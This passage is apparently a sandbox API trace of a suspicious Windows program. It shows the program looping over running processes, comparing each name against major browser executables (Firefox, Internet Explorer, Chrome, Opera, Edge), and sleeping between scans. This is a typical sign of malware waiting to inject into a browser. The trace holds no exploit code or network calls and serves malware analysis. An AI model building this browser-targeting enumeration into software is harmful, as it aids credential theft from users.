lpString2="microsoftedgecp.exe") returned -1 [0204.529] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0204.530] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0204.530] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0204.530] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0204.530] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0204.530] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.530] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0204.530] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0204.530] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0204.530] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0204.530] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0204.530] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.530] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.531] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0204.531] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0204.531] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0204.531] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0204.531] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.531] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0204.531] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0204.531] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0204.532] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0204.532] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0204.532] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.532] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.532] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0204.532] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0204.532] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0204.532] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0204.532] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.532] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0204.533] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0204.533] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0204.533] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0204.533] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0204.533] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.533] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.533] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0204.533] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0204.533] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0204.533] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0204.533] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.533] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0204.534] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0204.534] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0204.534] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0204.534] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0204.534] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.534] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0204.534] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0204.535] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0204.535] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0204.535] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0204.535] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.535] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0204.535] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0204.535] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0204.535] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0204.535] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0204.535] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.535] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0204.536] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0204.536] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0204.536] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0204.536] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0204.536] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.536] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0204.536] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0204.536] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0204.536] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0204.536] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0204.536] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.536] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0204.537] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0204.537] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0204.537] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0204.537] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0204.537] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.537] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0204.538] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0204.538] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0204.538] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0204.538] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0204.538] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.538] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0204.538] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0204.538] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0204.538] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0204.538] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0204.538] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0204.538] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0204.539] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="firefox.exe") returned 1 [0204.539] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="iexplore.exe") returned 1 [0204.539] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="chrome.exe") returned 1 [0204.539] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="opera.exe") returned 1 [0204.539] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.539] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0204.539] CloseHandle (hObject=0xe8) returned 1 [0204.540] Sleep (dwMilliseconds=0x3e8) [0205.580] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0205.582] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.582] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0205.582] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0205.582] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0205.582] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0205.582] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0205.582] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0205.583] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0205.583] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0205.583] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0205.583] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0205.583] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0205.583] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0205.583] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0205.583] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0205.583] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0205.583] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0205.583] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.583] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0205.584] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0205.584] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0205.584] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0205.584] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0205.584] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.584] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0205.584] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0205.584] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0205.585] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0205.585] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0205.585] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.585] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0205.585] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0205.585] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0205.585] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0205.585] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0205.585] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.585] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0205.586] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0205.586] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0205.586] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0205.586] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0205.586] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.586] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0205.586] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0205.586] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0205.586] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0205.586] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0205.586] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.586] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0205.587] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0205.587] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0205.587] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0205.587] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0205.587] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.587] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0205.588] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0205.588] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0205.588] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0205.588] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0205.588] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.588] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.588] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0205.588] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0205.588] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0205.588] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0205.588] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.588] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.589] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0205.589] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0205.589] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0205.589] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0205.589] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.589] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.589] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0205.589] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0205.589] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0205.589] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0205.589] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.589] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.590] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0205.590] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0205.590] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0205.590] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0205.590] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.590] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.590] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0205.590] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0205.590] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0205.591] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0205.591] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.591] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0205.591] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0205.591] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0205.591] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0205.591] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0205.591] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.591] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.592] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0205.592] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0205.592] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0205.592] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0205.592] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.592] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.592] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0205.592] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0205.592] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0205.592] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0205.592] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.592] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0205.593] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0205.593] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0205.593] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0205.593] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0205.593] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.593] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0205.593] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0205.593] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0205.593] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0205.593] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0205.593] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.594] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, 